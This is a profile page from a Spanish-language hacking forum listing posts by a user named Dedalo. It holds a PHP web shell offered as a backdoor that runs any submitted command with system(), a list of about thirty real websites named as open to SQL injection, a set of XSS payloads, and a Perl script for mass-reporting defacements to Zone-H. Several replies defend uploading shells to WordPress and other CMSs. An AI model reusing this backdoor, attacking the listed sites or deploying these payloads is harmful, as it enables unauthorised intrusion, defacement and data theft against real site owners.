Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Dedalo

Páginas 1 2 3 4 5 6
#61
Bugs y Exploits / Re:Atacando a un Wordpress
Julio 03, 2012, 04:21:57 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pero si no sabes leer la edicion de archivos del wordpress
no estas mas bien provocando oleadas de lammers defacers?
por que lo que estas poniendo no son tecnicas de ataque como tal
estas poniendo metodos de modificacion de contenido
y subir la shell es como que muy ovio como subir ese tipo de chells
detodos modos desde un sqli puedes subir una chell
o miles de cosas mas, creo que esto solo proboca oleadas de lammers defaceros
que el deface no es mas que grafitteo inutil :3


xD brother creer que una shell es para hacer un deface es limitar tu mente al 100% yo puse esto porque cuando trabajas en pentesting... tu objetivo es ejecutar consola remota en cualquier sistema... ejecutarle un meterpreter hacer pivoting a partir de un server con una web con bug alojada la shell en un server no es necesariamente para defacear sino para poder ingresar a otro server en la lan o diferentes cosas... yo no soy defacer y no soy partidario de el tampoco pero esto para mi si es una técnica de ataque... depende de los ojos que lo ven...


Saludos,
Dedalo
#62
Dudas y pedidos generales / Re:[CONSULTA] Backtrack:
Julio 02, 2012, 10:38:16 PM
el usb es booteable? debes hacerlo booteable...


Saludos,
Dedalo
#63
Bugs y Exploits / Command Executer [MINI]
Julio 02, 2012, 10:20:40 PM
Lo podríamos mas usar como backd00r... aquí se los dejo igual y si les gusta...

Código: php
<?php
/*======================================*\
|| #################################### ||
|| # Command Line Runner - KrypTiK    # ||
|| #################################### ||
\*======================================*/
if(isset($_POST['sub'])){
    system($_POST['cmd']);
}
echo <<<FORM
<html>
    <head>
        <title>-CMD Line-</title>
        <style type="text/css">
            body {
                background: #000;
                color: #0C0;
                font-weight: bold;
                font-family: Lucida Console;
                text-align: center;
            } input {
                background: #000;
                border-style:solid;
                border-width:2px;
                border-color: #0C0;
                border-radius: 10px;
                color: #0C0;
                font-weight: bold;
                font-family: Lucida Console;
            } hr {
                background: #0C0;
                width: 100%;
                height: 1px;
                border-bottom: #000;
                border-top: #000;
            } footer*.head {
                font-size: 12px;
            } a*a:visited {
                color: #0C0;
                font-decoration: underline;
            } a:hover {
                color: #FFF;
                font-decoration: underline;
            }
        </style>
    </head>
    <body>
        <form method="POST">
            <h2>Command Executer<span class="head"><br>Made By KrypTiK</span></h2><hr>
            <input type="text" name="cmd"><input type="submit" name="sub" value="doCMD"><br><br>
            <a href="#"><footer>Made By KrypTiK</footer></a>
        </form>
    </body>
</html>
FORM;
?>



Saludos,
Dedalo
#64
Pentesting / Re:Curso Pentesting
Julio 02, 2012, 08:56:51 PM
Excelente Aporte bro Fijado :)


Saludos,
Dedalo
#65
Bugs y Exploits / Webs Vulnerables a SQLi
Julio 02, 2012, 04:44:26 PM
Aquí les dejo una listita de webs con SQLi para que practiquen y para que no se olviden... NO DEFACING PLS


Código: text

http://amiclub.net63.net/main.php?id=1
http://www.deffner.org/main.php?id=14&pic=3&tex=1&lis=1
http://www.smeda.org/main.php?id=111
http://www.stmaryslutterworth.org/pages/main.php?id=32
http://www.pedestrians-int.org/main.php?id=31
http://www.snhdt.org/events-main.php?id=6
http://www.kclbratuz.org/site/html/php/main.php?id=4
http://www.aimos.org/main.php?id=119&lang=en
http://www.rotaryhknw.org/main.php?id=59
http://www.calvarytyler.org/_pages/main.php?id=38
http://www.hospicefoundationok.org/main.php?id=13
http://www.calvarylm.org/kingjesus/main.php?id=5
http://www.kdkl.org/main.php?id=58042
http://www.qhdredcross.org/cn/main.php?id=26
http://www.latirajala.org/main.php?ID=103
http://www.socolab.de/content/main.php?id=10
http://www.weinschenk.de/bb/main.php?id=3
http://www.readyicons.com/iconset-preview.php?id=11
http://www.chambers.ie/preview.php?id=932
http://www.readyicons.com/iconset-preview.php?id=9
http://www.chambers.ie/preview.php?id=889
http://www.sledmass.com/pages.php?id=44
http://www.nutritioncare.net/pages.php?id=26
http://ihmahmedabad.com/pages.php?id=48
http://www.enlightenmentquartet.com/pages.php?id=9
http://susansey.com/pages.php?ID=5
http://snakedancecondos.com/pages.php?id=10
http://www.comotucomoyo.org/20_senti...rial.php?id=14
http://www.gorodokboxing.com/material.php?id=1



Saludos,
Dedalo
#66
Bugs y Exploits / Re:Symlink con la tool
Julio 02, 2012, 02:10:37 PM
que versión del php es la del servidor? existe el archivo named.conf?



Saludos,
Dedalo
#67
Bugs y Exploits / Secure Shell (ACID SHELL BASED)
Julio 01, 2012, 05:54:45 PM
Esta shell está basada en lo que era la ACID Shell... tiene varios bypass aquí se las comparto.





You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Saludos,
Dedalo
#68
Bugs y Exploits / Re:Blind SQLi desde cero [SQLi a ciegas] by ANTRAX
Julio 01, 2012, 01:15:45 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tengo una pequeña pregunta, en caso de que el pass este en md5, me imagino que ahi se acabo todo, porque no creo que nos de por probar los 32 caracteres del password
o me equivoco??


igual y la blindsqli que ha hecho antrax aquí es muy básica en true y false... hay otras que son Time Based... que tienes que usar Sleep() para ver si son reales o no y pues muchas veces son en sha-1 así que yo te recomendaría que para blind sqli uses SQLMAP inclusive si fuesen encriptadas como en wordpress o joomla con algún salt te demorarías un monton...



Saludos,
Dedalo
#69
Bugs y Exploits / Re:Blind SQLi desde cero [SQLi a ciegas] by ANTRAX
Junio 30, 2012, 08:15:58 PM
es lo primero que normalmente yo hago para saber si está encriptada.


Saludos,
Dedalo
#70
Bugs y Exploits / Re:Blind SQLi desde cero [SQLi a ciegas] by ANTRAX
Junio 30, 2012, 08:11:38 PM
Está excelente Antrax muy bien explicado... deberíamos recalcar que los passwords muchas veces están en MD5.


Saludos,
Dedalo
#71
Bugs y Exploits / Vectores de Ataque Xss
Junio 30, 2012, 06:33:36 PM
Se que hay ya muchos Lists de vectores para Xss pero Les voy a pasar los que usé para algunos de mis mejores Xss:



Código: text
"><script>alert(0)</script>
</title><script>alert(/SeguridadBlanca/)</script>
"/><script>alert(1);</script>
'"><script>alert(0);</script>
"><iframe onclick=alert(1)></iframe>
</textarea>"><script>prompt(1)</script>
"><img src=x onerror=prompt(1);>
//>'>"><img src=x onerror=prompt(1);>
"><img src=x onerror=alert(/SeguridadBlanca/);>



Como me gusta chrome el que mas uso para probar antes de mandarme a testear con el firefox para que salten uso:


Código: text
"><h1>hols</h1>
"><marquee>sb</h1>
"/><img src=x />



Hasta los populares han caido con estos Vectores...













Saludos,
Dedalo
#72
Bugs y Exploits / Zone-H Reporter
Junio 30, 2012, 04:44:53 PM
Esta t00l es un poco priv8 no muchos la tienen me la pasó un amigo hace un timesito y se las comparto para los que son defacers puedan reportar de manera mas rápida sus ataques...


Código: perl
#!/usr/bin/perl

#####################################
#   	         Zone-H Notify                                          #	                          
#####################################

############
use LWP::UserAgent;
############
system('cls');
system ('title Powered By PrinceofHacking');
############

print "                         #####################\n   ";
print "                      #    Zone-Notify    #\n  ";
print "                       #        USO        #\n  ";
print "                       # [1] Single Deface #\n";
print "                         # [2] Mass   Deface #\n";
print "                         # [3] Help & About  #\n";
print "                         #####################\n\n   ";

$pick=<STDIN>;
if ($pick>3) {
print "Unknown Command\n";
}
if ($pick ==1)
{

print "Mode : Single Deface\n\n";
print "Defacer [Nickname] :\n";
$Def=<STDIN>;
print "Dominio:\n";
$Dom=<STDIN>;
if ($Dom =~ /http:\/\//)
{
$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $Dom,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1";
}
else
{
print "Error\n";
}
}
else
{
$new="http://" . "$Dom";
$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $new,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1";
}
else
{
print "Error\n";
}
}
}
#############################################Mass###########################################
if ($pick == 2){
print "Mode : Mass Deface\n\n";
open(site,"owned.txt");

@ARRAY=<site>;

close site;
print "Defacer [Nickname] :\n";
$Def=<STDIN>;
foreach $mass(@ARRAY){
if ($mass !~ /http:/) {
$mass='http://' . $mass;
}
print "$mass\n";

$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $mass,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1\n\n";
}
else
{
print "Error\n";
}
}
}
#####################About##############
if ($pick ==3)
{
print "Para la opcion [2] crear un texto con las paginas y guardarlo como : owned.txt\n";
print "Example\n";
print "http://link.com\n";
print "http://link2.com\n";
print "http://link3.com\n\n";
}



Saludos,
Dedalo
#73
Dudas y pedidos generales / Re:[AYUDA] PROGRAMA RECORDER
Junio 28, 2012, 05:56:46 PM
Thanks... Downloading!!!!



Saludos,
Dedalo
#74
Pentesting / Re:[Propuesta] Taller de Pentesting desde 0
Junio 28, 2012, 05:02:00 PM
Tu vas a dar el curso?



Saludos,
Dedalo
#75
Bugs y Exploits / Re:Atacando a un Wordpress
Junio 28, 2012, 12:32:08 AM
Muchos no saben como subir shells en ciertos cms yo no sabia como hacerlo en wordpress en algún momento... y nadie me dijo tube que averiguar solo lo que hago es facilitarselo a otros...


Saludos,
Dedalo
#76
Bugs y Exploits / Re:Atacando a un Wordpress
Junio 27, 2012, 11:57:17 PM
En esta sección van técnicas de ataque también y esta es una técnica de ataque, de como subir shell en ciertos cms también...


Saludos,
Dedalo
#77
Dudas y pedidos generales / [SOLUCIONADO] Programa recorder
Junio 27, 2012, 11:55:42 PM
Quisiera que alguien me diga un programa para grabar mi desktop desde ubuntu...


Saludos,
Dedalo
#78
Bugs y Exploits / Re:Upload shell en Joomla
Junio 27, 2012, 08:18:46 PM
Excelente post :) muy útil.


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Saludos,
Dedalo
#79
Bugs y Exploits / Re:Subir Shell desde la Administración de un foro SMF
Junio 27, 2012, 08:18:08 PM
Excelente post :) Muy interesante método.


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Saludos,
Dedalo
#80
Bugs y Exploits / Re:Atacando a un Wordpress
Junio 27, 2012, 04:28:43 PM
Si debes ser admin con symlink o con sqli como dice en el post es obvio que le sacas el password al admin...

el objetivo de este post es de ataque... sería un poco tonto y lammer atacar un wordpress propio.


Saludos,
Dedalo
Páginas 1 2 3 4 5 6